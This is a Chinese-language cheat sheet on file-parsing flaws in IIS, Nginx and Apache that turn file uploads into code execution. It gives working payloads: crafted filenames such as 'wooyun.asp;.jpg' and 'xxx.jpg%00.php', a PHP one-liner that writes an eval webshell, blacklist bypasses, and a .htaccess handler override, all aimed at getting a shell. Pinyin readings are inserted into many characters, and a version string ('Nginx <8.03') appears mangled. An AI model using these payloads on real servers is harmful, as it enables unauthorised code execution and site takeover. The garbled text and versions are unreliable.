一、IIS 5.x/6.0解析漏洞

IIS 6.0解析利用方法有兩種

1.目錄解析

/xx.asp/xx.jpg

2.文件解析

wooyun.asp;.jpg

第一種，在網(wǎng)站下建立文件夾的名字為 .asp、.asa 的文件夾，其目錄內(nèi)的任何擴展名的文件都被IIS當作asp文件來解析并執(zhí)行。

例如創(chuàng)建目錄 wooyun.asp，那么/wooyun.asp/1.jpg將被當作asp文件來執(zhí)行。假設(shè)黑闊可以控制上傳文件夾路徑,就可以不管你上傳后你的圖片改不改名都能拿shell了。

第二種，在IIS6.0下，分號后面的不被解析，也就是說wooyun.asp;.jpg會被服務(wù)器看成是wooyun.asp還有IIS6.0 默認的可執(zhí)行文件除了asp還包含這三種:

/wooyun.asa

/wooyun.cer

/wooyun.cdx

二、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞

Nginx解析漏洞這個偉大的漏洞是我國安全組織80sec發(fā)現(xiàn)的…

在默認Fast-CGI開啟狀況下,黑闊上傳一個名字為wooyun.jpg，內(nèi)容為：<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>的文件，然后訪問wooyun.jpg/.php,在這個目錄下就會生成一句話木馬 shell.php。

三、Nginx <8.03 空字節(jié)代碼執(zhí)行漏洞

影響版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

Nginx在圖片中嵌入PHP代碼然后通過訪問

xxx.jpg%00.php

來執(zhí)行其中的代碼

四、Apache解析漏洞

Apache 是從右到左開始判斷解析,如果為不可識別解析,就再往左判斷.

比如 wooyun.php.owf.rar “.owf”和”.rar” 這兩種后綴是apache不可識別解析,apache就會把wooyun.php.owf.rar解析成php.

如何判斷是不是合法的后綴就是這個漏洞的利用關(guān)鍵,測試時可以嘗試上傳一個wooyun.php.rara.jpg.png…（把你知道的常見后綴都寫上…）去測試是否是合法后綴

五、其他

在windows環(huán)境下，xx.jpg[空格] 或xx.jpg. 這兩類文件都是不允許存在的，若這樣命名，windows會默認除去空格或點,黑客可以通過抓包，在文件名后加一個空格或者點繞過黑名單.若上傳成功，空格和點都會被windows自動消除,這樣也可以getshell。

如果在Apache中.htaccess可被執(zhí)行.且可被上傳.那可以嘗試在.htaccess中寫入:

<FilesMatch "wooyun.jpg"> SetHandler application/x-httpd-php </FilesMatch>

然后再上傳shell.jpg的木馬, 這樣shell.jpg就可解析為php文件